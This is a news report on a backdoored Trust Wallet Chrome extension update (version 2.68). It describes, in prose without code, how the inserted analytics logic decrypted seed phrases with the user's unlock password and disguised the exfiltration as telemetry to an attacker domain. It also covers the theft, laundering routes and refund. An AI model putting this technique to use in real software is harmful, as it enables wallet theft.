- Trust Wallet Chrome extension version 2.68 included malicious code that decrypted users’ mnemonic phrases and sent them to an attacker-controlled server.
- About $7M in Bitcoin, Ethereum and other assets were drained, and users are advised to upgrade the Trust Wallet Chrome extension to version 2.69.
Trust Wallet users who rely on the Chrome browser extension now face a serious security problem. A compromised update drained funds from many wallets and showed how one release can harm a large user base. The update, version 2.68 released around December 24, 2025, contained a hidden backdoor that attackers planted inside the code. They used it to steal about $7 million in cryptocurrency before investigators and the company reacted and pulled the build. The provider, owned by Binance, said that only the Chrome extension suffered from this issue and that mobile applications and other browser builds remain safe for everyday use. According to the Chrome Web Store listing, roughly one million people installed the extension, and Trust Wallet has urged all of them to upgrade to version 2.69, disable the vulnerable build, and ignore unofficial support messages that might exploit the confusion.
How the Trust Wallet browser extension incident unfolded
The incident began like a normal software update. Trust Wallet shipped Chrome extension version 2.68 through the official Web Store without any obvious warning signs. Users installed the release as usual, unlocked their wallets, and in many cases imported recovery phrases. They did not realise that the extension now contained malicious code that worked in the background whenever they interacted with the interface. Within days, early victims reported that cryptocurrency disappeared soon after they opened the extension, and on-chain investigator ZachXBT linked these reports to the latest release, suggesting that the new code played a direct role in the sudden drainage of assets from many accounts. Security researcher Akinator examined the affected build and found obfuscated logic inside a bundled JavaScript file named 4482.js. The code pointed to an external server at api.metrics-trustwallet[.]com and signalled that the extension could be sending sensitive wallet data to infrastructure outside the normal Trust Wallet environment. Security and crypto media outlets picked up the findings, and public warnings spread quickly across social networks as more users complained about missing funds and unauthorised transfers from wallets that had used the compromised extension. In response, Trust Wallet confirmed a security incident affecting version 2.68 only, told users to disable that specific build, and pushed a patched version 2.69 to the Chrome Web Store that removed the backdoor. The company later issued a detailed notice on X and other channels, stating that it had verified losses of about $7 million so far and promising that all impacted users would receive full refunds once internal checks finished.
Technical breakdown of the malicious Trust Wallet Chrome extension code
Blockchain security firm SlowMist carried out a detailed comparison of Trust Wallet extension version 2.68.0 against the fixed 2.69.0 build. The team concluded that the attacker had inserted new logic into the internal analytics component of the extension. The malicious routine iterated through every wallet stored in the plugin and sent a request to obtain the mnemonic phrase for each account, effectively queuing all configured wallets for later theft. When a user unlocked the extension, the code reused the same password or passkeyPassword that the legitimate software needed for decryption and used that credential to decrypt the encrypted mnemonic phrase inside the local environment. Once the routine had the mnemonic in plain text, it transmitted the seed words to a remote server controlled by the attacker at the api.metrics-trustwallet[.]com endpoint, which allowed the intruder to reconstruct each wallet on separate devices and start draining funds at will. Investigators followed the infrastructure trail behind the malicious server. They saw that the domain metrics-trustwallet[.]com appeared in registration records on December 8, 2025, while the first observed request to the api subdomain surfaced on December 21, a few days before users began to notice missing assets. This timing suggests that the attacker prepared the collection pipeline and tested scripts ahead of the full campaign. SlowMist emphasised that this incident did not come from a compromised third-party dependency, such as a poisoned npm package, but from direct tampering with the Trust Wallet source code itself, where the intruder modified the internal repository and analytics logic. To exfiltrate the harvested data, the attacker used the legitimate posthog-js open-source analytics library as a transport channel and redirected what looked like normal telemetry traffic toward the fake metrics server, blending sensitive wallet information with regular usage events. Analysts working with the firm said that the level of access needed to alter the internal repository or development environment suggests that the attacker may have taken control of Trust Wallet related developer devices or build pipelines before December 8 and even raised the possibility of a nation-state operator, although no public proof has surfaced to confirm that attribution.
Trust Wallet’s Response and Next Steps
The stolen cryptocurrency currently stands at roughly $7 million in total, based on Trust Wallet statements and independent tracking by analytics groups that monitor movements on public blockchains. Early breakdowns indicate that the intruder drew about $3 million in Bitcoin, around $431 in Solana, and more than $3 million in Ether from compromised wallets, although these numbers will likely evolve as additional addresses and flows come into focus. On-chain investigator ZachXBT has reported that the incident has already produced hundreds of victims, while other reports describe single accounts losing six-figure sums after years of inactivity, including one long-dormant wallet that held assets worth about $3.5 million and another address that had been inactive for more than two years but still lost roughly $1.4 million. PeckShield’s analysis shows that around $2.8 million of the stolen funds remain in addresses under the attacker’s control across Bitcoin, EVM chains, and Solana. More than $4 million has already flowed into centralised services, with about $3.3 million routed through ChangeNOW, approximately $340,000 going to FixedFloat, and roughly $447,000 reaching KuCoin in what appears to be an effort to swap and launder the proceeds across networks. Other research groups that specialise in anti-money-laundering monitoring have tracked further movements through cross-chain bridges and mixers, which makes recovery more complex even though exchanges now possess detailed timelines and address lists that can help them freeze residual balances if the attacker attempts to convert more stolen assets. Trust Wallet, Binance, and external investigators continue to cooperate with these platforms in order to follow the funds, identify repeat patterns in the transactions, and search for any operational mistakes that might link the on-chain activity to specific infrastructure or identities used during the campaign.
Trust Wallet response, refund pledge, and wider security lessons
Trust Wallet moved quickly to reassure users that it would make victims whole. The team used its official X account and later statements amplified by Binance founder Changpeng Zhao, who said that about $7 million had been affected and confirmed that the wallet provider would cover the losses in full, a message that later updates repeated while the team refined the refund process. The company explained that only desktop browser extension users on Chrome with version 2.68 ran any risk from the malicious update and that mobile-only customers, as well as those using other extension builds, did not fall within the scope of the compromise. It also urged everyone to avoid interacting with unsolicited messages that claim to offer support but do not come from its official channels. In public comments, Trust Wallet stressed that supporting affected users remains its top priority and that it will continue to share guidance about safe migration steps, including upgrading to version 2.69 and rotating seed phrases where necessary after checking whether a given wallet ever touched the compromised browser build. Zhao added that investigators view an insider or someone with privileged access as a likely factor in how the malicious code entered the Trust Wallet extension codebase and passed release controls, though he did not present concrete evidence and noted that teams still need time to examine build logs, access trails, and permission records before they can draw firm conclusions. For everyday users, the event again highlights how browser extensions that handle private keys remain attractive targets, because even reputable teams can suffer compromises of internal infrastructure, so current best practice still favours storing larger balances in hardware wallets, checking extension permissions with care, and treating every unexpected prompt for a recovery phrase as a red flag, regardless of how familiar the interface appears. Trust Wallet, for its part, has signalled that it will reinforce internal security reviews for analytics code, tighten deployment pipelines, and work more closely with external auditors and security partners so that similar backdoors find it much harder to pass through release processes in future updates.
Conclusion
The Trust Wallet browser extension breach shows how a single compromised update can undermine years of development work and community trust, yet the decision to reimburse roughly $7 million in losses and the transparent publication of technical details give investigators and the wider ecosystem a clearer view of how the backdoor operated and how similar threats might appear in other projects. Users who upgrade to version 2.69, rotate seed phrases where appropriate, and treat analytics-style permissions with greater caution can reduce exposure in the short term, while long-term resilience will depend on how Trust Wallet and other wallet developers harden their build systems, review processes, and extension release channels against subtle code tampering that targets mnemonic handling and recovery workflows.
Disclaimer
The information provided in this article is for informational purposes only and should not be considered financial advice. The article does not offer sufficient information to make investment decisions, nor does it constitute an offer, recommendation, or solicitation to buy or sell any financial instrument. The content is opinion of the author and does not reflect any view or suggestion or any kind of advise from CryptoNewsBytes.com. The author declares he does not hold any of the above mentioned tokens or received any incentive from any company.
Featured image created by AI
Subscribe To Our Newsletter
Join our mailing list to receive the latest news and updates from our team.